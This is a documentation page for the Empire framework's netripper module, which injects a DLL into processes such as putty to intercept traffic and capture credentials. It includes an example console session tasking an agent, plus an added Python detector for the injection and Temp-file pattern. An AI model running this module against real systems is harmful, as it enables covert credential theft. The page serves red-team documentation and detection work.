Invoke-NetRipper - Empire Module
This page contains detailed information about how to use the powershell/collection/netripper Empire module. For a list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-NetRipper
Module: powershell/collection/netripper
Source code [1]: empire/server/modules/powershell/collection/netripper.yaml
Source code [2]: empire/server/data/module_source/collection/Invoke-NetRipper.ps1
MITRE ATT&CK: T1179, T1410
Language: PowerShell
Needs admin: No
OPSEC safe: No
Background: Yes
The netripper module injects NetRipper into the targeted processes. NetRipper uses API hooking to intercept network traffic and encryption-related functions from a low-privileged user, and can therefore capture both plain-text traffic and encrypted traffic before encryption/after decryption.
This module runs in the background and is OPSEC unsafe: it writes to disk and could therefore be detected by AV/EDR running on the target system.
Note that the netripper module does not need administrative privileges to work properly, which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the netripper module:
Agent
Agent to run module on.
SearchStrings
Strings to search for in traffic.
Default value: user,login,pass,database,config
Additional Module Options
This is a list of additional options that are supported by the netripper module:
AllData
Switch. Log all data instead of just plaintext.
Datalimit
Data limit capture per request.
Default value: 4096
LogLocation
Folder location to log sniffed data to.
Default value: TEMP
ProcessID
Specific process ID to inject the NetRipper DLL into.
ProcessName
Inject the NetRipper DLL into all processes with the given name (e.g. putty).
Netripper Example Usage
Here's an example of how to use the netripper module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/netripper
Author Ionut Popescu (@NytroRST)
@mattifestation
@harmj0y
Background True
Comments https://github.com/NytroRST/NetRipper/
Description Injects NetRipper into targeted processes, which uses API hooking in
order to intercept network traffic and encryption related functions
from a low privileged user, being able to capture both plain-text
traffic and encrypted traffic before encryption/after decryption.
Language powershell
Name powershell/collection/netripper
NeedsAdmin False
OpsecSafe False
Techniques http://attack.mitre.org/techniques/T1179
http://attack.mitre.org/techniques/T1410
,Record Options-,---------------------------------,----------,-------------------------------------,
| Name | Value | Required | Description |
|---------------|---------------------------------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|---------------------------------|----------|-------------------------------------|
| AllData | | False | Switch. Log all data instead of |
| | | | just plaintext. |
|---------------|---------------------------------|----------|-------------------------------------|
| Datalimit | 4096 | False | Data limit capture per request. |
|---------------|---------------------------------|----------|-------------------------------------|
| LogLocation | TEMP | False | Folder location to log sniffed data |
| | | | to. |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessID | | False | Specific process ID to inject the |
| | | | NetRipper dll into. |
|---------------|---------------------------------|----------|-------------------------------------|
| ProcessName | | False | Inject the NetRipper dll into all |
| | | | processes with the given name (i.e. |
| | | | putty). |
|---------------|---------------------------------|----------|-------------------------------------|
| SearchStrings | user,login,pass,database,config | True | Strings to search for in traffic. |
'---------------'---------------------------------'----------'-------------------------------------'
(Empire: usemodule/powershell/collection/netripper) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/netripper) > set SearchStrings user,login,pass,database,config
[*] Set SearchStrings to user,login,pass,database,config
(Empire: usemodule/powershell/collection/netripper) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
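From the defender's side, the two artifacts this page describes give a correlation hook: the module injects a DLL into a process chosen by PID or name, and the hooked process then writes its captures under LogLocation, which defaults to TEMP. The following Python scanner is an added example (not part of this page or of the Empire project) that pairs an injection event with a later Temp-folder file write by the injected process; the event shapes are simplified assumptions loosely modelled on Sysmon event IDs 8 (CreateRemoteThread) and 11 (FileCreate), and all sample events are constructed.

```python
"""Flag processes that were injected into and then wrote under a Temp folder.

This is the pattern the netripper module leaves behind with its default
LogLocation (TEMP): a hooked process such as putty.exe suddenly writing
files to %TEMP% shortly after a remote thread was created in it.
Event shapes below are assumptions, not a real Sysmon schema.
"""
from datetime import datetime

INJECT, FILE_CREATE = 8, 11                # assumed event ids (Sysmon-like)
TEMP_MARKER = "\\appdata\\local\\temp\\"   # matched case-insensitively

# Constructed sample events (not real telemetry).
EVENTS = [
    {"t": "2024-01-01T10:00:05", "id": INJECT,
     "src_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "src_pid": 3300, "tgt_image": r"C:\Program Files\PuTTY\putty.exe",
     "tgt_pid": 4120},
    {"t": "2024-01-01T10:00:09", "id": FILE_CREATE, "pid": 4120,
     "image": r"C:\Program Files\PuTTY\putty.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\capture.log"},
    # Benign: a Temp write with no preceding injection into that process.
    {"t": "2024-01-01T11:30:00", "id": FILE_CREATE, "pid": 900,
     "image": r"C:\Windows\System32\notepad.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\draft.tmp"},
]


def find_injected_temp_writers(events, window_seconds=600):
    """Return one alert per Temp-folder write made by a process that had a
    thread injected into it at most `window_seconds` earlier."""
    injected = {}   # target pid -> (injection time, injecting image)
    alerts = []
    for e in sorted(events, key=lambda ev: ev["t"]):
        ts = datetime.fromisoformat(e["t"])
        if e["id"] == INJECT:
            injected[e["tgt_pid"]] = (ts, e["src_image"])
        elif e["id"] == FILE_CREATE and TEMP_MARKER in e["target"].lower():
            hit = injected.get(e["pid"])
            if hit and (ts - hit[0]).total_seconds() <= window_seconds:
                alerts.append({"pid": e["pid"], "image": e["image"],
                               "injected_by": hit[1], "file": e["target"]})
    return alerts


if __name__ == "__main__":
    for a in find_injected_temp_writers(EVENTS):
        print(f"ALERT pid={a['pid']} {a['image']} injected by "
              f"{a['injected_by']} wrote {a['file']}")
```

A non-default LogLocation will not match TEMP_MARKER, so in practice the path check should be widened to any user-writable folder the injected program has no business writing to.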
Authors
- Ionut Popescu (@NytroRST)
- @mattifestation
- @harmj0y
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/collection/netripper.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/collection/Invoke-NetRipper.ps1
- https://github.com/NytroRST/NetRipper/
- http://attack.mitre.org/techniques/T1179
- http://attack.mitre.org/techniques/T1410
- https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
See Also
Check also the following modules related to this module:
- powershell/collection/get_sql_query
- powershell/collection/SharpLoginPrompt
- powershell/collection/file_finder
- powershell/collection/get_indexed_item
- powershell/collection/ninjacopy
- powershell/collection/clipboard_monitor
- powershell/collection/FoxDump
- powershell/collection/prompt
- powershell/collection/minidump
- powershell/collection/SauronEye
- powershell/collection/toasted
- powershell/collection/screenshot
- powershell/collection/find_interesting_file
- powershell/collection/inveigh
- powershell/collection/browser_data
- powershell/collection/WireTap
- powershell/collection/WebcamRecorder
- powershell/collection/ChromeDump
- powershell/collection/USBKeylogger
- powershell/collection/get_sql_column_sample_data
- powershell/collection/keylogger
- powershell/collection/get-winupdates
- powershell/collection/packet_capture
- powershell/collection/SharpChromium
- powershell/collection/vaults/remove_keepass_config_trigger
- powershell/collection/vaults/add_keepass_config_trigger
- powershell/collection/vaults/keethief
- powershell/collection/vaults/find_keepass_config
- powershell/collection/vaults/get_keepass_config_trigger
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.